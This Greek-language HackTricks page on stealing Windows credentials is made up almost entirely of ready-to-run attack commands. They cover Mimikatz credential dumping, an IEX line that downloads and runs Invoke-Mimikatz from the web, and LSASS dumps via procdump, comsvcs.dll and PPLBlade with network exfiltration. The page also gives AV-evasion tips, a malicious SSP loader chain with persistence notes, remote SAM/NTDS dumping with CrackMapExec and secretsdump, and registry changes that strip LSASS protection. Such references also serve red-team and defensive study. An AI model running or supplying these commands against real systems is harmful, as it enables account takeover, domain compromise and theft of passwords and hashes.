Κλοπή Windows Credentials

Tip

Μάθετε & εξασκηθείτε στο AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE)
Μάθετε & εξασκηθείτε στο GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE) Μάθετε & εξασκηθείτε στο Azure Hacking: HackTricks Training Azure Red Team Expert (AzRTE)

Υποστηρίξτε το HackTricks

Credentials Mimikatz

#Elevate Privileges to extract the credentials
privilege::debug #This should give am error if you are Admin, butif it does, check if the SeDebugPrivilege was removed from Admins
token::elevate
#Extract from lsass (memory)
sekurlsa::logonpasswords
#Extract from lsass (service)
lsadump::lsa /inject
#Extract from SAM
lsadump::sam
#One liner
mimikatz "privilege::debug" "token::elevate" "sekurlsa::logonpasswords" "lsadump::lsa /inject" "lsadump::sam" "lsadump::cache" "sekurlsa::ekeys" "exit"

Βρείτε άλλα πράγματα που μπορεί να κάνει το Mimikatz σε this page.

Invoke-Mimikatz

IEX (New-Object System.Net.Webclient).DownloadString('https://raw.githubusercontent.com/clymb3r/PowerShell/master/Invoke-Mimikatz/Invoke-Mimikatz.ps1')
Invoke-Mimikatz -DumpCreds #Dump creds from memory
Invoke-Mimikatz -Command '"privilege::debug" "token::elevate" "sekurlsa::logonpasswords" "lsadump::lsa /inject" "lsadump::sam" "lsadump::cache" "sekurlsa::ekeys" "exit"'

Μάθετε για κάποιες πιθανές προστασίες credentials εδώ. Αυτές οι προστασίες θα μπορούσαν να εμποδίσουν το Mimikatz από το να εξάγει κάποια credentials.

Credentials με Meterpreter

Χρησιμοποιήστε το Credentials Plugin που έχω δημιουργήσει για να αναζητήσετε passwords και hashes μέσα στο θύμα.

#Credentials from SAM
post/windows/gather/smart_hashdump
hashdump

#Using kiwi module
load kiwi
creds_all
kiwi_cmd "privilege::debug" "token::elevate" "sekurlsa::logonpasswords" "lsadump::lsa /inject" "lsadump::sam"

#Using Mimikatz module
load mimikatz
mimikatz_command -f "sekurlsa::logonpasswords"
mimikatz_command -f "lsadump::lsa /inject"
mimikatz_command -f "lsadump::sam"

Παράκαμψη AV

Procdump + Mimikatz

Επειδή Procdump from SysInternals είναι ένα νόμιμο εργαλείο της Microsoft, δεν εντοπίζεται από Defender.
Μπορείτε να χρησιμοποιήσετε αυτό το εργαλείο για να dump the lsass process, download the dump και να extract τις credentials locally από το dump.

Μπορείτε επίσης να χρησιμοποιήσετε SharpDump.

#Local
C:\procdump.exe -accepteula -ma lsass.exe lsass.dmp
#Remote, mount https://live.sysinternals.com which contains procdump.exe
net use Z: https://live.sysinternals.com
Z:\procdump.exe -accepteula -ma lsass.exe lsass.dmp
# Get it from webdav
\\live.sysinternals.com\tools\procdump.exe -accepteula -ma lsass.exe lsass.dmp
//Load the dump
mimikatz # sekurlsa::minidump lsass.dmp
//Extract credentials
mimikatz # sekurlsa::logonPasswords

Αυτή η διαδικασία εκτελείται αυτόματα με SprayKatz: ./spraykatz.py -u H4x0r -p L0c4L4dm1n -t 192.168.1.0/24

Σημείωση: Κάποια AV μπορεί να εντοπίσουν ως κακόβουλη τη χρήση του procdump.exe για dump του lsass.exe, αυτό συμβαίνει επειδή εντοπίζουν τη συμβολοσειρά “procdump.exe” και “lsass.exe”. Επομένως είναι πιο διακριτικό να περάσετε ως όρισμα το PID του lsass.exe στο procdump αντί για το όνομα lsass.exe.

Δημιουργία dump του lsass με comsvcs.dll

Ένα DLL με όνομα comsvcs.dll που βρίσκεται στο C:\Windows\System32 είναι υπεύθυνο για το dumping process memory σε περίπτωση κατάρρευσης. Αυτό το DLL περιλαμβάνει μια function με όνομα MiniDumpW, σχεδιασμένη να κληθεί χρησιμοποιώντας το rundll32.exe.
Δεν έχουν σημασία τα πρώτα δύο ορίσματα, αλλά το τρίτο χωρίζεται σε τρία στοιχεία. Το PID της διεργασίας που θα γίνει dump αποτελεί το πρώτο στοιχείο, η τοποθεσία του αρχείου dump το δεύτερο, και το τρίτο στοιχείο πρέπει να είναι αυστηρά η λέξη full. Δεν υπάρχουν εναλλακτικές επιλογές.
Μετά την ανάλυση αυτών των τριών στοιχείων, το DLL δημιουργεί το αρχείο dump και μεταφέρει τη μνήμη της συγκεκριμένης διεργασίας στο αρχείο.
Η χρήση της comsvcs.dll είναι εφικτή για το dump της διεργασίας lsass, αποφεύγοντας έτσι την ανάγκη για ανέβασμα και εκτέλεση του procdump. Αυτή η μέθοδος περιγράφεται λεπτομερώς στο https://en.hackndo.com/remote-lsass-dump-passwords/.

Η παρακάτω εντολή χρησιμοποιείται για την εκτέλεση:

rundll32.exe C:\Windows\System32\comsvcs.dll MiniDump <lsass pid> lsass.dmp full

Μπορείτε να αυτοματοποιήσετε αυτή τη διαδικασία με lssasy.

Dumping lsass with Task Manager

  1. Κάντε δεξί κλικ στη γραμμή εργασιών (Task Bar) και επιλέξτε Task Manager
  2. Κάντε κλικ στο More details
  3. Αναζητήστε τη διεργασία “Local Security Authority Process” στην καρτέλα Processes
  4. Κάντε δεξί κλικ στη διεργασία “Local Security Authority Process” και επιλέξτε “Create dump file”.

Dumping lsass with procdump

Procdump είναι ένα ψηφιακά υπογεγραμμένο εκτελέσιμο από τη Microsoft που αποτελεί μέρος της σουίτας sysinternals.

Get-Process -Name LSASS
.\procdump.exe -ma 608 lsass.dmp

Εξαγωγή μνήμης του lsass με PPLBlade

PPLBlade είναι ένα Protected Process Dumper Tool που υποστηρίζει την απόκρυψη των memory dump και τη μεταφορά τους σε απομακρυσμένους σταθμούς εργασίας χωρίς να τα αποθηκεύει στον δίσκο.

Κύριες λειτουργίες:

  1. Παράκαμψη της προστασίας PPL
  2. Απόκρυψη των memory dump αρχείων για να αποφευχθεί η ανίχνευση από Defender που βασίζεται σε signatures
  3. Μεταφόρτωση των memory dump μέσω RAW και SMB upload methods χωρίς να γράφονται στο δίσκο (fileless dump)
PPLBlade.exe --mode dump --name lsass.exe --handle procexp --obfuscate --dumpmode network --network raw --ip 192.168.1.17 --port 1234

LalsDumper – εξαγωγή LSASS με βάση SSP χωρίς MiniDumpWriteDump

Το Ink Dragon περιλαμβάνει έναν τρίων σταδίων dumper που ονομάζεται LalsDumper και δεν καλεί ποτέ την MiniDumpWriteDump, οπότε τα EDR hooks σε αυτό το API δεν ενεργοποιούνται:

  1. Stage 1 loader (lals.exe) – αναζητά στο fdp.dll έναν placeholder που αποτελείται από 32 μικρά γράμματα d, τον αντικαθιστά με την απόλυτη διαδρομή προς το rtu.txt, αποθηκεύει το τροποποιημένο DLL ως nfdp.dll, και καλεί AddSecurityPackageA("nfdp","fdp"). Αυτό αναγκάζει LSASS να φορτώσει το κακόβουλο DLL ως νέο Security Support Provider (SSP).
  2. Stage 2 inside LSASS – όταν LSASS φορτώνει το nfdp.dll, το DLL διαβάζει το rtu.txt, κάνει XOR κάθε byte με 0x20, και χαρτογραφεί το αποκωδικοποιημένο blob στη μνήμη πριν μεταβιβάσει την εκτέλεση.
  3. Stage 3 dumper – το χαρτογραφημένο payload επαν-υλοποιεί τη λογική του MiniDump χρησιμοποιώντας direct syscalls που επιλύονται από hashed API names (seed = 0xCD7815D6; h ^= (ch + ror32(h,8))). Μια αφιερωμένη export με όνομα Tom ανοίγει %TEMP%\<pid>.ddt, ροήςει ένα συμπιεσμένο dump του LSASS στο αρχείο και κλείνει το handle ώστε να μπορεί να γίνει exfiltration αργότερα.

Operator notes:

  • Κρατήστε τα lals.exe, fdp.dll, nfdp.dll και rtu.txt στον ίδιο κατάλογο. Το Stage 1 επανεγγράφει τον hard-coded placeholder με την απόλυτη διαδρομή προς το rtu.txt, οπότε ο διαχωρισμός τους σπάει την αλυσίδα.
  • Η εγγραφή γίνεται προσθέτοντας nfdp στο HKLM\SYSTEM\CurrentControlSet\Control\Lsa\Security Packages. Μπορείτε να ορίσετε αυτή την τιμή χειροκίνητα ώστε το LSASS να ξαναφορτώνει το SSP σε κάθε εκκίνηση.
  • Τα αρχεία %TEMP%\*.ddt είναι συμπιεσμένα dumps. Αποσυμπιέστε τα τοπικά και στη συνέχεια δώστε τα στο Mimikatz/Volatility για εξαγωγή διαπιστευτηρίων.
  • Η εκτέλεση του lals.exe απαιτεί admin/SeTcb δικαιώματα ώστε το AddSecurityPackageA να πετύχει· μόλις η κλήση επιστρέψει, το LSASS φορτώνει το rogue SSP και εκτελεί το Stage 2.
  • Η αφαίρεση του DLL από το δίσκο δεν το απομακρύνει από το LSASS. Είτε διαγράψτε την καταχώρηση μητρώου και επανεκκινήστε το LSASS (reboot) είτε αφήστε το για μακροχρόνια persistence.

CrackMapExec

Dump SAM hashes

cme smb 192.168.1.0/24 -u UserNAme -p 'PASSWORDHERE' --sam

Dump LSA secrets

cme smb 192.168.1.0/24 -u UserNAme -p 'PASSWORDHERE' --lsa

Εξαγωγή του NTDS.dit από τον στοχευόμενο DC

cme smb 192.168.1.100 -u UserNAme -p 'PASSWORDHERE' --ntds
#~ cme smb 192.168.1.100 -u UserNAme -p 'PASSWORDHERE' --ntds vss

Dump του ιστορικού κωδικών του NTDS.dit από τον target DC

#~ cme smb 192.168.1.0/24 -u UserNAme -p 'PASSWORDHERE' --ntds-history

Εμφάνιση της ιδιότητας pwdLastSet για κάθε λογαριασμό στο NTDS.dit

#~ cme smb 192.168.1.0/24 -u UserNAme -p 'PASSWORDHERE' --ntds-pwdLastSet

Stealing SAM & SYSTEM

Αυτά τα αρχεία πρέπει να βρίσκονται στο C:\windows\system32\config\SAM και C:\windows\system32\config\SYSTEM. Αλλά δεν μπορείτε απλά να τα αντιγράψετε με τον κανονικό τρόπο επειδή είναι προστατευμένα.

From Registry

Ο ευκολότερος τρόπος για να κλέψετε αυτά τα αρχεία είναι να αποκτήσετε ένα αντίγραφο από το registry:

reg save HKLM\sam sam
reg save HKLM\system system
reg save HKLM\security security

Κατεβάστε αυτά τα αρχεία στο Kali μηχάνημά σας και εξάγετε τα hashes χρησιμοποιώντας:

samdump2 SYSTEM SAM
impacket-secretsdump -sam sam -security security -system system LOCAL

Volume Shadow Copy

Μπορείτε να αντιγράψετε προστατευμένα αρχεία χρησιμοποιώντας αυτή την υπηρεσία. Πρέπει να είστε Διαχειριστής.

Χρήση vssadmin

Το εκτελέσιμο vssadmin είναι διαθέσιμο μόνο σε εκδόσεις Windows Server

vssadmin create shadow /for=C:
#Copy SAM
copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy8\windows\system32\config\SAM C:\Extracted\SAM
#Copy SYSTEM
copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy8\windows\system32\config\SYSTEM C:\Extracted\SYSTEM
#Copy ntds.dit
copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy8\windows\ntds\ntds.dit C:\Extracted\ntds.dit

# You can also create a symlink to the shadow copy and access it
mklink /d c:\shadowcopy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\

Αλλά μπορείτε να κάνετε το ίδιο από το Powershell. Αυτό είναι ένα παράδειγμα του πώς να αντιγράψετε το αρχείο SAM (ο σκληρός δίσκος που χρησιμοποιείται είναι “C:” και αποθηκεύεται στο C:\users\Public) αλλά μπορείτε να το χρησιμοποιήσετε για την αντιγραφή οποιουδήποτε προστατευμένου αρχείου:

$service=(Get-Service -name VSS)
if($service.Status -ne "Running"){$notrunning=1;$service.Start()}
$id=(gwmi -list win32_shadowcopy).Create("C:\","ClientAccessible").ShadowID
$volume=(gwmi win32_shadowcopy -filter "ID='$id'")
cmd /c copy "$($volume.DeviceObject)\windows\system32\config\sam" C:\Users\Public
cmd /c copy "$($volume.DeviceObject)\windows\system32\config\system" C:\Users\Public
cmd /c copy "$($volume.DeviceObject)\windows\ntds\ntds.dit" C:\Users\Public
$volume.Delete();if($notrunning -eq 1){$service.Stop()}

Κώδικας από το βιβλίο: https://0xword.com/es/libros/99-hacking-windows-ataques-a-sistemas-y-redes-microsoft.html

Invoke-NinjaCopy

Τέλος, μπορείτε επίσης να χρησιμοποιήσετε το PS script Invoke-NinjaCopy για να δημιουργήσετε ένα αντίγραφο των SAM, SYSTEM και ntds.dit.

Invoke-NinjaCopy.ps1 -Path "C:\Windows\System32\config\sam" -LocalDestination "c:\copy_of_local_sam"

Active Directory Διαπιστευτήρια - NTDS.dit

Το NTDS.dit αρχείο θεωρείται η καρδιά του Active Directory, καθώς περιέχει κρίσιμα δεδομένα για αντικείμενα χρηστών, ομάδες και σε ποιες ομάδες ανήκουν. Εκεί αποθηκεύονται τα password hashes των domain χρηστών. Αυτό το αρχείο είναι μια βάση δεδομένων Extensible Storage Engine (ESE) και βρίσκεται στο %SystemRoom%/NTDS/ntds.dit.

Μέσα σε αυτή τη βάση δεδομένων διατηρούνται τρεις κύριοι πίνακες:

  • Data Table: Αυτός ο πίνακας αποθηκεύει πληροφορίες για αντικείμενα όπως χρήστες και ομάδες.
  • Link Table: Καταγράφει σχέσεις, όπως η συμμετοχή σε ομάδες.
  • SD Table: Εδώ φυλάσσονται οι Security descriptors για κάθε αντικείμενο, διασφαλίζοντας την ασφάλεια και τον έλεγχο πρόσβασης για τα αποθηκευμένα αντικείμενα.

More information about this: http://blogs.chrisse.se/2012/02/11/how-the-active-directory-data-store-really-works-inside-ntds-dit-part-1/

Τα Windows χρησιμοποιούν Ntdsa.dll για να αλληλεπιδράσουν με αυτό το αρχείο και αυτό χρησιμοποιείται από το lsass.exe. Στη συνέχεια, ένα μέρος του αρχείου NTDS.dit μπορεί να βρεθεί μέσα στη μνήμη του lsass (μπορεί να βρείτε τα πιο πρόσφατα προσπελασμένα δεδομένα πιθανότατα λόγω βελτίωσης της απόδοσης με τη χρήση cache).

Αποκρυπτογράφηση των hashes μέσα στο NTDS.dit

Το hash είναι κρυπτογραφημένο 3 φορές:

  1. Αποκρυπτογραφήστε το Password Encryption Key (PEK) χρησιμοποιώντας το BOOTKEY και RC4.
  2. Αποκρυπτογραφήστε το hash χρησιμοποιώντας το PEK και RC4.
  3. Αποκρυπτογραφήστε το hash χρησιμοποιώντας DES.

Το PEK έχει την ίδια τιμή σε κάθε domain controller, αλλά είναι κρυπτογραφημένο μέσα στο αρχείο NTDS.dit χρησιμοποιώντας το BOOTKEY του αρχείου SYSTEM του domain controller (διαφέρει ανάμεσα σε domain controllers). Γι’ αυτό, για να αποκτήσετε τα διαπιστευτήρια από το αρχείο NTDS.dit χρειάζεστε τα αρχεία NTDS.dit και SYSTEM (C:\Windows\System32\config\SYSTEM).

Αντιγραφή NTDS.dit χρησιμοποιώντας Ntdsutil

Διαθέσιμο από το Windows Server 2008.

ntdsutil "ac i ntds" "ifm" "create full c:\copy-ntds" quit quit

Μπορείτε επίσης να χρησιμοποιήσετε την τεχνική volume shadow copy για να αντιγράψετε το αρχείο ntds.dit. Θυμηθείτε ότι θα χρειαστείτε επίσης ένα αντίγραφο του SYSTEM file (πάλι, dump it from the registry or use the volume shadow copy τεχνική).

Εξαγωγή hashes από NTDS.dit

Μόλις αποκτήσετε τα αρχεία NTDS.dit και SYSTEM, μπορείτε να χρησιμοποιήσετε εργαλεία όπως το secretsdump.py για να εξαγάγετε τα hashes:

secretsdump.py LOCAL -ntds ntds.dit -system SYSTEM -outputfile credentials.txt

Μπορείτε επίσης να εξάγετε αυτόματα χρησιμοποιώντας έναν έγκυρο domain admin user:

secretsdump.py -just-dc-ntlm <DOMAIN>/<USER>@<DOMAIN_CONTROLLER>

Για μεγάλα αρχεία NTDS.dit συνιστάται να τα εξάγετε χρησιμοποιώντας gosecretsdump.

Τέλος, μπορείτε επίσης να χρησιμοποιήσετε το metasploit module: post/windows/gather/credentials/domain_hashdump ή mimikatz lsadump::lsa /inject

Εξαγωγή αντικειμένων domain από NTDS.dit σε βάση δεδομένων SQLite

Τα αντικείμενα NTDS μπορούν να εξαχθούν σε μια βάση δεδομένων SQLite με ntdsdotsqlite. Όχι μόνο τα secrets εξάγονται, αλλά και ολόκληρα τα αντικείμενα και τα attributes τους για περαιτέρω εξαγωγή πληροφοριών όταν το ακατέργαστο αρχείο NTDS.dit έχει ήδη ανακτηθεί.

ntdsdotsqlite ntds.dit -o ntds.sqlite --system SYSTEM.hive

Το SYSTEM hive είναι προαιρετικό αλλά επιτρέπει την αποκρυπτογράφηση μυστικών (NT & LM hashes, supplemental credentials όπως cleartext passwords, kerberos ή trust keys, NT & LM password histories). Μαζί με άλλες πληροφορίες, εξάγονται τα ακόλουθα δεδομένα: user και machine accounts με τα hashes τους, UAC flags, timestamps για την τελευταία σύνδεση και αλλαγή κωδικού, accounts description, ονόματα, UPN, SPN, groups και recursive memberships, organizational units tree και membership, trusted domains με trusts type, direction και attributes…

Lazagne

Κατεβάστε το binary από here. Μπορείτε να χρησιμοποιήσετε αυτό το binary για να εξαγάγετε credentials από διάφορα software.

lazagne.exe all

Άλλα εργαλεία για την εξαγωγή credentials από το SAM και το LSASS

Windows credentials Editor (WCE)

Αυτό το εργαλείο μπορεί να χρησιμοποιηθεί για την εξαγωγή credentials από τη μνήμη. Κατεβάστε το από: http://www.ampliasecurity.com/research/windows-credentials-editor/

fgdump

Εξάγει credentials από το αρχείο SAM

You can find this binary inside Kali, just do: locate fgdump.exe
fgdump.exe

PwDump

Εξαγωγή διαπιστευτηρίων από το αρχείο SAM

You can find this binary inside Kali, just do: locate pwdump.exe
PwDump.exe -o outpwdump -x 127.0.0.1
type outpwdump

PwDump7

Κατεβάστε το από: http://www.tarasco.org/security/pwdump_7 και απλά εκτελέστε το και οι κωδικοί θα εξαχθούν.

Mining idle RDP sessions and weakening security controls

Το FinalDraft RAT του Ink Dragon περιλαμβάνει έναν tasker DumpRDPHistory του οποίου οι τεχνικές είναι χρήσιμες για κάθε red-teamer:

DumpRDPHistory-style telemetry collection

  • Outbound RDP targets – αναλύστε κάθε user hive στο HKU\<SID>\SOFTWARE\Microsoft\Terminal Server Client\Servers\*. Κάθε υποκλειδί αποθηκεύει το όνομα του server, UsernameHint, και το χρονικό σήμα τελευταίας εγγραφής. Μπορείτε να αναπαράγετε τη λογική του FinalDraft με PowerShell:
Get-ChildItem HKU:\ | Where-Object { $_.Name -match "S-1-5-21" } | ForEach-Object {
Get-ChildItem "${_.Name}\SOFTWARE\Microsoft\Terminal Server Client\Servers" -ErrorAction SilentlyContinue |
ForEach-Object {
$server = Split-Path $_.Name -Leaf
$user = (Get-ItemProperty $_.Name).UsernameHint
"OUT:$server:$user:$((Get-Item $_.Name).LastWriteTime)"
}
}
  • Inbound RDP evidence – ερευνήστε το Microsoft-Windows-TerminalServices-LocalSessionManager/Operational log για Event IDs 21 (επιτυχής σύνδεση) και 25 (αποσύνδεση) για να χαρτογραφήσετε ποιος διαχειρίστηκε το μηχάνημα:
Get-WinEvent -LogName "Microsoft-Windows-TerminalServices-LocalSessionManager/Operational" \
| Where-Object { $_.Id -in 21,25 } \
| Select-Object TimeCreated,@{n='User';e={$_.Properties[1].Value}},@{n='IP';e={$_.Properties[2].Value}}

Μόλις μάθετε ποιος Domain Admin συνδέεται τακτικά, dump το LSASS (με LalsDumper/Mimikatz) όσο η αποσυνδεδεμένη συνεδρία του/της εξακολουθεί να υπάρχει. Το CredSSP + NTLM fallback αφήνει τον verifier και τα tokens τους στο LSASS, τα οποία μπορούν στη συνέχεια να αναπαραχθούν μέσω SMB/WinRM για να αποκτήσετε το NTDS.dit ή να εγκαταστήσετε persistence σε domain controllers.

Registry downgrades targeted by FinalDraft

reg add HKLM\SYSTEM\CurrentControlSet\Control\Lsa /v DisableRestrictedAdmin /t REG_DWORD /d 1 /f
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v LocalAccountTokenFilterPolicy /t REG_DWORD /d 1 /f
reg add HKLM\SYSTEM\CurrentControlSet\Control\Lsa /v DSRMAdminLogonBehavior /t REG_DWORD /d 2 /f
reg add HKLM\SYSTEM\CurrentControlSet\Control\Lsa /v RunAsPPL /t REG_DWORD /d 0 /f
  • Η ρύθμιση DisableRestrictedAdmin=1 αναγκάζει την πλήρη επαναχρησιμοποίηση credentials/tickets κατά τη χρήση RDP, επιτρέποντας pivoting τύπου pass-the-hash.
  • LocalAccountTokenFilterPolicy=1 απενεργοποιεί το UAC token filtering, ώστε οι local admins να λαμβάνουν μη περιορισμένα tokens μέσω του δικτύου.
  • DSRMAdminLogonBehavior=2 επιτρέπει στον DSRM administrator να συνδεθεί ενώ ο DC είναι online, δίνοντας στους επιτιθέμενους έναν ακόμη ενσωματωμένο λογαριασμό με υψηλά προνόμια.
  • RunAsPPL=0 αφαιρεί τις LSASS PPL protections, κάνοντας την πρόσβαση στη μνήμη απλή για dumpers όπως το LalsDumper.

Αναφορές

Tip

Μάθετε & εξασκηθείτε στο AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE)
Μάθετε & εξασκηθείτε στο GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE) Μάθετε & εξασκηθείτε στο Azure Hacking: HackTricks Training Azure Red Team Expert (AzRTE)

Υποστηρίξτε το HackTricks